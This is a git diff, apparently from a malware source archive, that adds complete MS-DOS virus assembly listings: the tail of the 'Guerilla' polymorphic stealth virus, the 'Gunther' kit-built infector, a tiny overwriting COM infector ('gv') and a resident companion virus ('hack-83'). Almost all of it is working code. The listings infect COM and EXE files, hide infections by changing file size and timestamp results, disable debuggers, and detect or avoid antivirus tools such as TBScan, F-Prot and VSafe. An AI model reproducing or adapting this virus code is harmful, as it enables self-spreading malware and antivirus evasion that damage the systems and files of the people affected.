dx, dx ; check filesize + jz checklow1 ; + cmp dx, 5 ; too big? + ja findquit ; then quit + jmp checkheader ; else continue +checklow1: + cmp ax, 5000 ; too small? + jb findquit ; then quit + + +checkheader: + mov ax, word ptr [si+04h] ; convert size in header + mov cx, 512 ; from pages to bytes + mul cx ; + mov cx, word ptr [si+02h] ; + or cx, cx ; + jz comparesize ; + sub ax, 512 ; + sbb dx, 0 ; + add ax, cx ; + adc dx, 0 ; +comparesize: + cmp ax, sizels ; <> means overlays or bad header + jne findquit ; + cmp dx, sizems ; <> means overlays or bad header + jne findquit ; + + mov dx,word ptr es:[di+20h] ; check filename against + lea si, [avtable2] ; list of programs not to infect + mov cx, numberav ; number in list +rock: + lodsw ; + cmp ax, dx ; + je findquit ; quit if found a bad one + loop rock ; + +; file is definitely ready to infect now + + push ds + pop es + lea si, [header+14h] ; save original CS:IP + lea di, [longjump] ; + movsw ; DS:SI -> ES:DI + movsw ; + + sub si, 0ah ; save original SS:SP + lea di, [origss] ; + movsw ; DS:SI -> ES:DI + inc di ; + inc di ; + movsw ; + + sub si, 12h ; top of header + + push si ; copy clean copy of file header + lea di, [origheader] ; + cld ; + mov cx, 18h ; + repz movsb ; + pop si ; + + + mov ax,5700h ; get file time/date + call simint21h ; + mov time, cx ; save time for later + mov date, dx ; save date for later + + call encryptheader ; encrypt original header copy + + mov es, sftes ; SFT in ES:DI + mov di, sftdi ; + + mov ax, sizels ; LSW of file size in AX + mov dx, sizems ; MSW or file size in DX + + mov word ptr es:[di+15h],ax ; point SFT to EOF + mov word ptr es:[di+17h],dx ; + + + mov cx, 16 + div cx + + + + inc si ; header manipulation start here + sub ax, word ptr [si+7] ; subtract header size + sbb dx, 0 ; 32-bit + + + mov word ptr [si+15h], ax ; NEW CS + mov word ptr [si+13h], dx ; NEW IP + mov delta, dx + inc ax + mov word ptr [si+0Dh], ax ; NEW SS=CS+1 + + add ax, 23 + rol ax, 1 + mov word ptr [si+11h], ax ; infection marker #1 + mov polykey, ax ; static polymorphic key + + get_key: + and al, 0Fh ; make al < or = 0Fh + or al, al ; + jnz goodkey ; if got 0 + inc al ; then make 1 +goodkey: mov byte ptr [crypt], al ; for encrypt_decrypt + mov byte ptr [crypt2], al ; for encrypt_decrypt2 + mov ch, 16 ; + sub ch, al + mov byte ptr [rotdecrypt],ch ; for encrypt_decrypt + test al, 1 ; random use ror or rol for crypt + jne use_rorah ; + +use_rolal: mov byte ptr [scratch],0c0h ; rol al,cl + mov byte ptr [alorah1],05h + mov byte ptr [alorah2],05h + jmp short here + +use_rorah: mov byte ptr [scratch],0cch ; ror ah,cl + mov byte ptr [alorah1],25h + mov byte ptr [alorah2],25h + + +here: + + + + mov word ptr [si+0Fh], 0 ; NEW SP + add word ptr [si+09h],(heap-startvirus)/16 + 1 + + push si + push di + push bx + + + mov bx, 3 ; Polymorphics + lea si, [cctable] ; + lea di, [clearcarry2] ; + call polymorph ; + lea di, [clearcarry3] ; + call polymorph ; + lea si, [movax305table] ; + lea di, [movax305] ; + call polymorph ; + lea si, [incditable] ; + lea di, [incdi] ; + call polymorph ; + lea si, [subbxbxtable] ; + lea di, [subbxbx] ; + call polymorph ; + lea si, [movsibptable] ; + lea di, [movsibp] ; + call polymorph ; + lea si, [oredxedxtable] ; + lea di, [oredxedx] ; + call polymorph ; + lea si, [movdi14table] ; + lea di, [movdi14] ; + call polymorph ; + lea si, [adddisitable] ; + lea di, [adddisi] ; + call polymorph ; + + mov bx, 2 ; Polymorphics + lea si, [jumpctable] ; + lea di, [jumpc] ; + call polymorph ; + lea si, [jumpztable] ; + lea di, [jumpz] ; + call polymorph ; + lea si, [decedxtable] ; + lea di, [decedx] ; + call polymorph ; + + + pop bx + pop di + pop si + + call getmins + add cx, offset (heap-startvirus) + mov ah, 40h + + push si + push di + push es + call messup ; Write virus + pop es + pop di + pop si + + mov ax, sizels + mov dx, sizems + + add ax, offset heap ; file size + virus size + adc dx, 0 + + mov cx, 512 + div cx + or dx, dx + jz noremainder + inc ax +noremainder: mov word ptr [si+1], dx + mov word ptr [si+3], ax + + + call movepointertotop + + lea dx, [header] ; write from buffer + call writeheader + +cont: mov ax, 5701h + mov cx, time + and cx, 0FFE0h + or cx, 000101b ; infection marker #2 + mov dx, date + call simint21h + + +findquit: + popf + pop ds + pop es + pop di + pop dx + pop cx + pop bx + pop ax + pop si + jmp go_int + + +repservice: + pop si + push di + mov di, dx + cmp byte ptr ds:[di], '$' + pop di + jne go_int + mov bx, 3135h + iret + +; ------------------------------------------------------------------------- +; INT 21 ah=4eh, 4fh stealth +; ------------------------------------------------------------------------- +findstealth: + call simint21h + jc endfs + + cmp cs:[stealthon], 0 + jz endfs + + push es + push cx + push bx + push ax + push di + + mov ah, 2fh ; current dta + call simint21h ; ES:BX + + xchg di, bx + + mov si, di + add di, 16h + add si, 1ah + + call searchstcommon + + pop di + pop ax + pop bx + pop cx + pop es + clc ; no error +endfs: + pop si + retf 2 + + + +; ------------------------------------------------------------------------- +; INT 21 ah=11h, 12h stealth +; ------------------------------------------------------------------------- +dirstealth: + + call simint21h ; call the interrupt + or al, al + jne endds + + cmp cs:[stealthon], 0 ; is stealthoff? + jz endds ; then quit + + push es + push cx + push bx + push ax + push di + + mov ah, 2fh + call simint21h + + xchg di, bx + mov bl, byte ptr es:[di] ; extended FCB + xor bl, 0ffh + jne notextended + + add di, 7h ; fix for extended + +notextended: + mov si, di + add di, 17h + add si, 1dh + call searchstcommon + + pop di + pop ax + pop bx + pop cx + pop es + +endds: + pop si + iret + +;---------------------------------------------------------------------------- +; SEARCH STEALTH COMMON ROUTINE BETWEEN INT 11/12, 4E/4F +;---------------------------------------------------------------------------- +searchstcommon: +;Entry: di=searchtimeaddr, si=searchsizeaddr + + mov ax, word ptr es:[di] ; + mov bx, ax + and ax, 011111b + xor ax, 000101b + jne commonquit ; is marker #2 set? + mov cl, 5 + shr bx, cl + and bx, 0111111b + + + cmp word ptr es:[si+2], 0 ; file big enough to stealth? + jnz st1 ; + cmp word ptr es:[si], 5000 ; file big enough to stealth? + jb commonquit ; it is not + +st1: + add bx, offset (heap-startvirus) + sub word ptr es:[si], bx ; subtract the file length + sbb word ptr es:[si+2], 0 ; 32-bit +commonquit: + ret + + +; ------------------------------------------------------------------------- +; Cleanvirus on OPEN 3dh +; ------------------------------------------------------------------------- +cleanvirus: + pop si + + push ax + push bx + push cx + push dx + push si + push di + push ds + push es + + + pushf + + + cmp ah, 6ch ; is it int 21h ah=6ch? + jne skip6c + mov dx, si ; DS:DX now filename + + +skip6c: + call checkdrive ; is it floppy? + jb stealthexit ; then quit + + cmp cs:[stealthon], 0 ; is stealthoff? + jz stealthexit ; then quit + + mov ax, 3d00h ; Open read only + call simint21h + jc stealthexit ; quit if cant open + + + + goodopen: xchg bx, ax + + + push cs + pop ds + + call sft + cmp word ptr es:[di+28h], 'XE' + jne stealthquit + + call checkmarker ; is marker #2 set? + jnz stealthquit ; else quit + + mov ax,word ptr es:[di+11h] ; file size + mov dx,word ptr es:[di+13h] + + mov sizels, ax + mov sizems, dx + + call getmins + add cx, 1ch + sub ax, cx ; move to where original header is + sbb dx, 0 + mov word ptr es:[di+15h],ax ; file pointer + mov word ptr es:[di+17h],dx + + lea dx, [origheader] ; read origheader + call readheader + jc stealthquit + + call decryptheader + + cmp byte ptr [si], 'M' ; was original header found and + jne stealthquit ; reconstructed correctly? + + call movepointertotop ; TOF via SFT + + call writeheader + jc stealthquit ; quit if cant disinfect + + + + mov ax, sizels + mov dx, sizems + + call getmins + add cx, offset heap + sub ax, cx + sbb dx, 0 + mov word ptr es:[di+15h],ax ; file pointer + mov word ptr es:[di+17h],dx + + mov ah, 40h ; erase virus from original file + xor cx, cx + call simint21h + + mov ax, 5701h + mov cx, time + mov dx, date + call simint21h ; restore original time & date + + +stealthquit: mov ah, 3eh + call simint21h + +stealthexit: + popf + pop es + pop ds + pop di + pop si + pop dx + pop cx + pop bx + pop ax + + + + go_int: + db 0eah ; jmp ssss:oooo + int21o dw ? + int21s dw ? + + +; ----------------------------------------------------------------------- +; Scan MCB's for resident AV s/w +; ----------------------------------------------------------------------- +; entry DI=0 +; return ZF=0 if none found +; return ZF=1 if one found + +checkresav: + push es + push ds + + mov ah, 52h ; undocumented + call simint21h ; -> ES:BX + push es:[bx-2] + pop ds + +checkanotherMCB: + cmp byte ptr ds:[di], 'M' + jz searchMCB + cmp byte ptr ds:[di], 'Z' + jnz av_isnt_resident +searchMCB: + lea si, [bp+avtable1] ; addr[avtable1] + mov cx, numberavmem ; number of AV checks + +avloop: mov ax, word ptr ds:[di+8] + cmp ax, word ptr cs:[si] ; + jnz chkmav + mov al, byte ptr cs:[si+2] + cmp al, byte ptr ds:[di+10] + jz av_is_resident + cmp al, '*' ; is wild card? + jz av_is_resident ; then found one + +chkmav: add si, 3 + loop avloop ; loop numberavmem times + + mov ax, ds + add ax, ds:[di+3] ; goto next MCB + inc ax + mov ds, ax + jmp short checkanotherMCB + +av_isnt_resident: +av_is_resident: + pop ds + pop es + ret + + +; ----------------------------------------------------------------------- +; Get the sft +; ----------------------------------------------------------------------- +; entry BX=file handle +; return ES:DI=SFT +; + sft: + + push bx + + mov ax, 1220h + int 2fh + + + xor bx, bx + mov bl, es:[di] + mov ax, 1216h + int 2fh + mov word ptr es:[di+2], 2 + + pop bx + + ret + +;-------------------------------------------------------------------------- +; Check Drive letter +;-------------------------------------------------------------------------- +; return CF=0 = not floppy +; return CF=1 = floppy +checkdrive: + mov ah, 19h + call simint21h + cmp al, 2 + ret + +;-------------------------------------------------------------------------- +; Check marker #2 +;-------------------------------------------------------------------------- +checkmarker: +; return ZF=1 = marker #2 set +; return ZF=0 = marker #2 not set + mov ax, word ptr es:[di+0dh] + and ax, 011111b + xor ax, 000101b + ret + +;-------------------------------------------------------------------------- +; Read header (1ch bytes) +;-------------------------------------------------------------------------- +; entry dx = addr[header] +readheader: + mov ah, 3fh + mov cx, 1ch + call simint21h + mov si, dx + ret + +;-------------------------------------------------------------------------- +; Write header (18h bytes) +;-------------------------------------------------------------------------- +; entry dx = addr[header] +writeheader: + mov ah, 40h + mov cx, 18h + call simint21h + ret + +;-------------------------------------------------------------------------- +; Get files minutes value +;-------------------------------------------------------------------------- +; return cx=minutes +getmins: + mov cx, word ptr es:[di+0dh] + shr cx, 1 + shr cx, 1 + shr cx, 1 + shr cx, 1 + shr cx, 1 + and cx, 0111111b + ret + +;-------------------------------------------------------------------------- +; Encrypt/Decrypt header (18h bytes) +;-------------------------------------------------------------------------- +decryptheader: +encryptheader: + push di + mov ah, byte ptr [time] + lea di, [origheader] + mov cx, 18h +h_loop: mov al, [di] + xor al, ah + mov [di], al + inc di + loop h_loop + pop di + ret + + +;-------------------------------------------------------------------------- +; Move SFT file pointer to top of file +;-------------------------------------------------------------------------- +movepointertotop: + mov word ptr es:[di+15h], 0 + mov word ptr es:[di+17h], 0 + ret + +;-------------------------------------------------------------------------- +; Polymorphic routine +;-------------------------------------------------------------------------- +; entry di = addr[destination] +; si = addr[table of opcodes to use] +; bx = # of possible instruction variations (max 3) +polymorph: + push es + push ds + push ax + push cx + push bx + push si + push di + + push cs + pop ds + push cs + pop es + + mov ax, polykey ; + xor ax, di ; gives each file a unique + ; polymorphic virus pattern that + ; does not change + trymore: + + shr ax, 1 + mov cx, ax + and cx, 3 + cmp cx, bx ; bx = # of possible instruction + jge trymore ; variations + + mov ax, cx + mov cx, 4 ; 4 opcode length + mul cl + add si, ax + mov cx, 5 ; 4 opcode length + jmp jumploop + db 0eah + genloop: mov al, cs:[si] + mov cs:[di], al + inc di + inc si + jumploop: loop genloop + + pop di + pop si + pop bx + pop cx + pop ax + pop ds + pop es + ret + +cctable db 0f8h,0f8h,0f8h,90h,0bh,0c0h,90h,90h,83h,0c8h,00h,90h +movsibptable db 55h,5eh,0f8h,0f8h,8bh,0f5h,0bh,0c0h,8bh,0f5h,0bh,0d2h +jumpctable db 90h,90h,72h,02h,73h,02h,0ebh,02h +adddisitable db 90h,03h,0feh,90h,0f8h,13h,0feh,0f8h,90h,0f8h,03h,0feh +incditable db 47h,4fh,47h,90h,4fh,47h,90h,47h,83h,0c7h,01h,90h +decedxtable db 90h,90h,66h,4ah,66h,83h,0eah,01h +oredxedxtable db 66h,0bh,0d2h,90h,66h,23h,0d2h,90h,66h,83h,0fah,00h +subbxbxtable db 2bh,0dbh,2bh,0dbh,0bbh,00h,00h,90h,90h,83h,0e3h,00h +movax305table db 0b4h,3h,0b0h,05h,0b9h,05h,03h,91h,0b0h,05h,0b4h,3h +jumpztable db 74h,02h,0ebh,0e8h,75h,0eah,90h,90h +movdi14table db 0b8h,14h,00h,97h,0bfh,14h,00h,90h,90h,0bfh,14h,00h + db 25h,90h + +virusname db ' Guerilla 1996 PH ' +rep_input db '$' +stealthon db 1 +numberconditions equ 11 + +numberavmem equ 3 +avtable1 db 'TB*' ; TB* + db 'NAV' ; NA* NAVSTR + db 'NEM' ; NE* NEMESIS + + +numberav equ 13 +avtable2: dw 'BT' ; TB* TBSCAN + dw 'IV' ; VI* VIRSTOP + dw 'VA' ; AV* AVP + dw 'AN' ; NA* NAVSTR + dw 'EN' ; NE* NEMESIS + dw 'SV' ; VS* VSHIELD OR VSAFE + dw 'IF' ; FI* FINDVIRU + dw '-F' ; F-* F-PROT + dw 'MI' ; IM* IM + dw 'VF' ; FV* FV386 + dw 'CS' ; SC* SCAN + dw 'BQ' ; QB* QBASIC + dw 'VI' ; IV* IV + +;------------------------------------------------------------------------ +; encrypt/decrypt subroutine #2 +;------------------------------------------------------------------------ +encrypt_decrypt2: + + db 0b0h ; mov al, XXh +crypt2: db 0h + jc encryptit2 +decryptit2: + mov byte ptr cs:[si+addorsub], 02ah ; sub + jmp short findaddr +encryptit2: + mov byte ptr cs:[si+addorsub], 02h ; add +findaddr: mov di, offset testit + add di, si + mov cx, offset (encrypt_decrypt2-testit) + + jmp patch2 + db 0eah +loop2: + mov ah, cs:[di] +addorsub: db 02h ; add ah,al or sub ah,al +scratch2: db 0e0h + mov cs:[di], ah + inc di +patch2: loop loop2 + ret + + + + messup: + push ax + push cx + + xor si, si + + stc + call encrypt_decrypt2 + + stc + call encrypt_decrypt + +; ----------------------------------------------------------------------- +; ENCRYPTION STOPS HERE +; ----------------------------------------------------------------------- +outitend: + + pop cx + pop ax + call simint21h + +clearcarry2: nop + nop + nop + nop + call encrypt_decrypt + +clearcarry3: nop + nop + nop + nop + call encrypt_decrypt2 + + ret + + +;------------------------------------------------------------------------ +; encrypt/decrypt subroutine #1 +;------------------------------------------------------------------------ +.386 +encrypt_decrypt: + + db 0b1h ; mov cl, XXh +crypt: db 0h + +jumpc: db 90h + db 90h + db 90h ; jc encryptit + db 90h + + db 0b1h ; mov cl, XXh +rotdecrypt: db 0h + +encryptit: +movdi14: + mov di, 14h + nop + + +adddisi: add di, si + nop + nop + + + mov edx, offset (outitend-outit+1) + jmp short patch1 + db 0eah +loop1: + db 2eh + db 8ah +alorah1: db 25h + + + + db 0d2h ; ror ah,cl +scratch: db 0cch + + db 2eh + db 88h +alorah2: db 25h + + + +incdi: inc di + nop + nop + nop + +patch1: +decedx: dec edx + nop + nop + +oredxedx: cmp edx, 0 + + +jumpz: + db 75h ; jnz loop1 + db 0eah ; + db 90h + db 90h +cryptret: + ret + +;-------------------------------------------------------------------------- +; Original int 21h routine +;-------------------------------------------------------------------------- + +simint21h: ; Simulate interrupt 21h + pushf ; call ssss:oooo +callfar db 9ah ; +int21off dw ? ; Offset of interrupt 21h +int21seg dw ? ; Segment of interrupt 21h + ret ; + + + +origheader db 18h dup (?) ; read buffer +time dw 0 +date dw 0 + +heap: +sftes dw 0 +sftdi dw 0 +sizems dw 0 +sizels dw 0 +polykey dw 0 +header db 1ch dup (?) ; read buffer +endheap: ; end + +seg_a ends +end startvirus diff --git a/MSDOS/Virus.MSDOS.Unknown.gunther.asm b/MSDOS/Virus.MSDOS.Unknown.gunther.asm new file mode 100644 index 00000000..7a20fcec --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.gunther.asm @@ -0,0 +1,422 @@ +; 'Gunther': A Virus From the Virus Creation 2000 System +; The Virus Creation 2000 System is Copywrited by John Burnette +; All Rights Reserved. + +; Author: Havoc The Chaos +; Notes: Fr my lurv, Kiersten B. + +; Greetings: Dark Angel, DecimatoR, Dark Avenger (You still out there?) +; The Additude Adjuster, Mucho Mass, The Old Bit Truth Crew, +; and virus writters (Except those who rely on kits and call +; them original code) everywhere! + +code segment byte public + assume cs: code + org 100h + +id = '=-' + +begin: + call next ; Get Delta Offset +next: pop bp + sub bp, offset next + + push cs + push cs + pop ds + pop es + + mov byte ptr [bp + lock_keys + 3], 244 + ; Prefetch Cue Unchanged +lock_keys: + mov al, 128 ; Screws DEBUG + out 21h, al ; If Tracing, Lock Keyboard + + mov ax, 4653h ; Remove F-Prot Utils + mov bx, 1 + mov cx, 2 + rep int 2Fh + + + mov byte ptr cs:[tb_here][bp], 0 ; Reset TB Flag + xor dx, dx + mov ds, dx + mov ax, word ptr ds:[6] + dec ax + mov ds, ax + + mov cx, 0FFFFh ; CX = 64k + mov si, dx ; SI = 0 + +look_4_tbclean: + mov ax, word ptr ds:[si] + xor ax, 0A5F3h + je check_it ; Jump If It's TBClean +look_again: + inc si ; Continue Search + loop look_4_tbclean + jmp not_found ; TBClean Not Found + +check_it: + mov ax, word ptr ds:[si+4] + xor ax, 0006h + jne look_again + mov ax, word ptr ds:[si+10] + xor ax, 020Eh + jne look_again + mov ax, word ptr ds:[si+12] + xor ax, 0C700h + jne look_again + mov ax, word ptr ds:[si+14] + xor ax, 406h + jne look_again + + mov bx, word ptr ds:[si+17] ; Steal REAL Int 1 Offset + mov byte ptr ds:[bx+16], 0CFh ; Replace With IRET + + mov bx, word ptr ds:[si+27] ; Steal REAL Int 3 Offset + mov byte ptr ds:[bx+16], 0CFh ; Replece With IRET + + mov byte ptr cs:[tb_here][bp], 1 ; Set The TB Flag On + + mov bx, word ptr ds:[si+51h] ; Get 2nd Segment of + mov word ptr cs:[tb_int2][bp], bx ; Vector Table + + mov bx, word ptr ds:[si-5] ; Get Offset of 1st Copy + mov word ptr cs:[tb_ints][bp], bx ; of Vector Table + +not_found: + mov cx, 9EBh + mov ax, 0FE05h + jmp $-2 + add ah, 3Bh ; Hlt Instruction (Kills TD) + jmp $-10 + + mov ax, 0CA00h ; Exit It TBSCANX In Mem + mov bx, 'TB' + int 2Fh + + cmp al, 0 + je okay + ret + +okay: + + mov ah, 47h + xor dl, dl + lea si, [bp+offset dir_buff+1] ; Save Original Directory + int 21h + + push es ; New DTA + push ds + mov ah, 1Ah + lea dx, [bp+offset newDTA] + int 21h + + lea di, [bp+offset origCSIP2] ; Save For EXE + lea si, [bp+offset origCSIP] + mov cx, 4 + rep movsw + + mov byte ptr [bp+numinfected], 0 + + mov ax, 3524h ; New INT 24h Handler + int 21h + mov ax, 2524h + mov dx, offset Int24 + int 21h + +traverse_path proc near + + push bp + pop bx + mov es, word ptr cs:[2Ch] ; ES = Environment Segment + xor di, di ; DI = Starting Offset + +find_path: + mov dx,'As' + int 0F2h + lea si,[bx + path_string] ; SI points to "PATH=" + lodsb ; Load First Byte in AL + mov cx,08000h ; Check 32767 Bytes + repne scasb ; Search Until The Byte Is Found + mov cx,4 ; Check The Next Four Bytes + +check_next_4: + lodsb ; Load The Next Letter of "PATH=" + scasb ; Compare It To Environment + jne find_path ; Get Another + loop check_next_4 ; Keep Checking + + mov word ptr [bx + path_ad], di ; Save The PATH Address + mov word ptr [bx + path_ad + 2], es ; Save The PATH's Segment + + lds si,dword ptr [bx + path_ad] ; DS:SI Points to PATH + lea di,[bp - 70] ; DI = Work Buffer + push cs + pop es + +move_subdir: + lodsb ; Load Next Byte + cmp al,';' ; Separator? + je moved_one ; Yes, We're Done + or al,al ; End of Path? + je moved_last_one ; Yes, Quit Our Loop + stosb ; Store Byte at ES:DI + jmp short move_subdir ; Keep Transfering Characters + +moved_last_one: + xor si, si ; Clear Buffer +moved_one: + mov word ptr es:[bx + path_ad],si ; Store SI in the path address + + cmp si, 0 ; Done? + je done ; Done. + + mov ah, 3Bh ; Change Directory + lea dx, [bx + path_ad] + int 21h + + lea dx, [di + com_spec] ; Find COM Files + call infect + lea dx, [di + exe_spec] ; Find EXE Files + call infect + lea dx, [di + ovr_spec] ; Find OV? Files + call infect + lea dx, [di + bin_spec] ; Find Binary Files + call infect + jmp move_subdir ; Get Another Sub-Directory + +done: ret + +traverse_path endp + pop ds ; Restore DTA + pop es + mov ah, 1Ah + mov dx, 80h + int 21h + + cmp sp, id ; EXE? + jne infect + +restore_exe: ; Restore EXE + mov ax, ds + add ax, 10h + add cs:[bp+word ptr origCSIP2+2], ax + add ax, cs:[bp+word ptr origSPSS2] + cli + mov ss, ax + mov sp, cs:[bp+word ptr origSPSS2+2] + sti + db 00EAh ; Jump To The Original Code +origCSIP2 db ? +old3_2 db ?,?,? +origSPSS2 dd ? +origCSIP db ? +old3 db 0cdh,20h,0 +origSPSS dd ? + +restore_com: ; Restore COM + mov di, 100h + push di + lea si, [bp+offset old3_2] + movsw + movsb + +return: ret ; Jump To Original Code + +infect: + mov cx, 7 + mov ah, 4Eh ; Find First File +findfirstnext: + int 21h + jc return + + cmp word ptr [bp+newDTA+33], 'AM' ; COMMAND.COM? + mov ah, 4Fh + jz findfirstnext ; Yes, So Get Another File + + lea dx, [bp+newDTA+30] ; Get Attributes + mov ax, 4300h + int 21h + jc return + push cx ; Save Them + push dx + + mov ax, 4301h ; Clear Attributes + push ax + xor cx, cx + int 21h + + mov ax, 3D02h ; Open File, Read/Write + lea dx, [bp+newDTA+30] + int 21h + xchg ax, bx + + mov ax, 5700h ; Get File Time/Date + int 21h + push cx ; Save Time/Date + push dx + + mov ah, 3Fh + mov cx, 1Ah ; Read Into File + lea dx, [bp+offset readbuffer] + int 21h + + mov ax, 4202h ; Move Pointer To End Of File + xor cx, cx + cwd + int 21h + + cmp word ptr [bp+offset readbuffer], 'ZM' ; EXE? + jz checkexe + + mov cx, word ptr [bp+offset readbuffer+1] + add cx, heap-begin+3 ; CX = Filesize + cmp ax, cx + jz jmp_close ; Already Infected + + cmp ax, 65535-(endheap-begin) ; Too Large To Infect? + ja jmp_close + + lea di, [bp+offset old3] ; Save First Three Bytes + lea si, [bp+offset readbuffer] + movsb + movsw + + mov cx, 3 ; Encoded Jump To Virus + sub ax, cx + mov word ptr [bp+offset readbuffer+1], ax + mov dl, 0E9h + mov byte ptr [bp+offset readbuffer], dl + jmp short continue_infect + +checkexe: + cmp word ptr [bp+offset readbuffer+10h], id + jnz skipp ; Not Infected, So Infect It + +jmp_close: + jmp close ; Infected, So Quit + +skipp: lea di, [bp+origCSIP] + lea si, [bp+readbuffer+14h] + movsw ; Save CS and IP + movsw + + sub si, 0Ah ; Save SS and SP + movsw + movsw + + push bx ; Filename + mov bx, word ptr [bp+readbuffer+8] ; Header Size + mov cl, 4 + shl bx, cl + + push dx + push ax + + sub ax, bx ; File Size - Header Size + sbb dx, 0 + + mov cx, 10h + div cx + + mov word ptr [bp+readbuffer+0Eh], ax ; SS + mov word ptr [bp+readbuffer+10h], id ; SP + mov word ptr [bp+readbuffer+14h], dx ; IP + mov word ptr [bp+readbuffer+16h], ax ; CS + + pop ax + pop dx + + add ax, heap-begin + adc dx, 0 + + mov cl, 9 + push ax + shr ax, cl + ror dx, cl + stc + adc dx, ax + pop ax + and ah, 1 + + mov word ptr [bp+readbuffer+2], ax + mov word ptr [bp+readbuffer+4], dx ; Fix Header + + pop bx + mov cx, 1Ah + +continue_infect: + + mov ah, 40h + mov cx, heap-begin ; Add Virus To The End + lea dx, [bp+offset begin] + int 21h + + mov ax, 4200h + xor cx, cx ; Move Pointer To Beginning + cwd + int 21h + + mov ah, 40h + mov cx, 1Ah ; Write Encoded Jump To Virus + lea dx, [bp+offset readbuffer] + int 21h + + inc [bp+numinfected] ; Infection Good + +close: + mov ax, 5701h ; Set Orig Date and Time + pop dx + pop cx + int 21h + + mov ah, 3Eh ; Close File + int 21h + + pop ax ; Restore Attributes + pop dx + pop cx + int 21h + + cmp [bp+numinfected], 5 + jae bye + mov ah, 4Fh ; No, So Find Another File + jmp findfirstnext + + mov ax, 2524h ; New INT 24h Handler + pop dx + pop ds + int 21h + + mov ah, 3Bh ; Function: Change Directory + lea dx, [bp+dir_buff] ; Restore Current Directory + int 21h ; Execute Function + +bye: ret + +Int24: mov ax, 3 ; Error Handling + iret + + +exe_spec db '*.EXE',0 ; EXE Filespec +ovr_spec db '*.OV?',0 ; OV? Filespec +bin_spec db '*.BIN',0 ; BIN Filespec +com_spec db '*.COM',0 ; COM Filespec +path_string db "PATH=" ; The PATH String To Search For + +heap: +donebin db 0 +dir_buff db 64 dup (0) ; Current Dir Buffer +newdta db 43 dup (?) ; New Disk Transfer Access +numinfected db ? ; Number Of Files Infected +path_ad dd ? ; Holds The PATH's Address +tb_ints dd 0 +tb_int2 dd 0 +tb_here db 0 +readbuffer db 1ah dup (?) +endheap: + +code ends + end begin diff --git a/MSDOS/Virus.MSDOS.Unknown.gv.asm b/MSDOS/Virus.MSDOS.Unknown.gv.asm new file mode 100644 index 00000000..710f5c26 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.gv.asm @@ -0,0 +1,21 @@ + xor cx,cx + mov dx,offset File + mov ah,4eh + int 21h +z: + mov dx,9eh + mov ax,3d02h + int 21h + mov bx,ax + mov dx,100h + mov cl,27h + mov ah,40h + int 21h + mov ah,3eh + int 21h + mov ah,4fh + int 21h + jnc z + ret +file db '*.com',0 +e: \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.hack-83.asm b/MSDOS/Virus.MSDOS.Unknown.hack-83.asm new file mode 100644 index 00000000..3971fa70 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.hack-83.asm @@ -0,0 +1,92 @@ +tic segment + org 100h + assume cs:tic, ds:tic, es:tic +; +len equ offset int21-100h ;LENGTH OF VIRUS CODE +; +;THE FOLLOWING CODE MAKES THE VIRUS GO RESIDENT. TO KEEP THE INFECTION +;CODE AS SHORT AS POSSIBLE, THE INT 21 VECTOR (4 BYTES) IS SAVED OUTSIDE +;THE VIRUS BODY. THIS MAY OCCASIONALLY CAUSE THE VECTOR TO BE OVERWRITTEN +;BY THE ENVIRONMENT, WHICH WILL CRASH THE SYSTEM. TO PREVENT THIS, DEFINE +;TWO WORDS FOR THE LABEL INT21 AND ADD FOUR BYTES TO THE RESIDENT CODE. +;THE FIRST TIME THAT AN "INFECTED" FILE IS RUN, IT WILL SIMPLY RETURN TO +;DOS. THIS IS BECAUSE THE RESIDENT CODE MUST FIRST BE LOADED. AFTER THAT +;EVERYTHING WILL APPEAR TO WORK NORMALLY. TO REMEDY THIS PROBLEM, ALTER +;THE MEMORY CONTROL BLOCK TO TRAP THE RESIDENT CODE, THEN JUMP TO IT. A +;STILL BETTER SOLUTION IS TO COPY THE VIRUS TO THE TOP OF MEMORY AND +;TRAP IT THERE. ALSO, DO NOT REVECTOR INTERRUPT BUT OVERWRITE THE +;ENTRY POINT WITH A FAR JUMP TO THE VIRUS AND THEN RESTORE IT. THESE +;TECHNIQUES WILL MAKE A BETTER, THOUGH LONGER VIRUS. +; +start: mov ax,3521h ;GET INT 21 VECTOR + int 21h + mov di,offset int21 + mov [di],bx ;SAVE IT + mov [di+2],es + mov dx,offset infect + mov ah,25h + int 21h ;REVECTOR TO VIRUS + mov dx,di + int 27h ;GO RESIDENT +; +;THIS IS THE ACTUAL INFECTION CODE. IT CHECKS FOR THE EXEC FUNCTION THEN +;TRIES TO RUN THE PROCESS AS AN EXE. IF THIS FAILS, THE VIRUS KNOWS THAT +;IT REALLY WAS A COM PROGRAM, IN WHICH CASE IT SIMPLY LETS THE CALL GO +;THROUGH. OTHERWISE A SHADOW COM FILE IS (RE)CREATED, "INFECTING" THE +;EXE. THE HIDDEN ATTRIBUTE IS SET ON THE SHADOW FILE. TO KEEP THESE FILES +;VISIBLE, SET CX TO 0 INSTEAD OF 2. +;NOTE: UNDER DOS 5.0, REGISTERS ES AND DS ARE SAME WHEN THE EXEC CALL +;IS ISSUED. SETTING ES TO DS IS ONLY NECESSARY TO MAKE THE VIRUS RUN UNDER +;DOS 3.X. OTHERWISE YOU CAN ELIMINATE THESE INSTRUCTIOS, BRINGING THE VIRUS +;BACK TO JUST 79 BYTES. +; +infect: cmp ax,4b00h ;EXEC? + jne interrupt ;IF NOT, CONTINUE INTERRUPT + push ax ;KEEP FUNCTION CALL + push es ;KEEP ES + push ds ;SET ES TO DS + pop es + mov di,dx ;SCAN TO EXT + mov al,'.' + repne scasb + push di ;POINTER TO EXT + mov ax,'XE' ;TRY TO RUN AS .EXE + stosw + stosb + pop di ;RETREIVE POINTER TO EXT + pop es ;RESTORE ES FOR EXEC + pop ax ;GET FUNCTION + push ax ;KEEP IT + push dx ;KEEP POINTER TO PROCESS NAME + pushf ;DO INTERRUPT + push cs + call interrupt + mov ax,'OC' ;CHANGE EXT TO COM + stosw + mov al,'M' + stosb + pop dx ;CLEAR STACK + pop ax + jc interrupt ;WASN'T .EXE SO JUST CONTINUE + mov cx,2 + mov ah,3ch ;CREATE SHADOW .COM FILE + int 21h + xchg bx,ax ;GET HANDLE + push cs ;WRITE VIRUS TO .COM FILE + pop ds ;SEGMENT OF VIRUS CODE + mov cl,len + mov dx,si ;=0100 HEX + mov ah,40h ;WRITE VIRUS AND EXIT +; +interrupt: + db 0eah ;FAR JUMP +int21: ;VECTOR GOES HERE +; +tic ends + end start + +; +; > and Remember Don't Forget to Call < +; > ARRESTED DEVELOPMENT +31.79.426o79 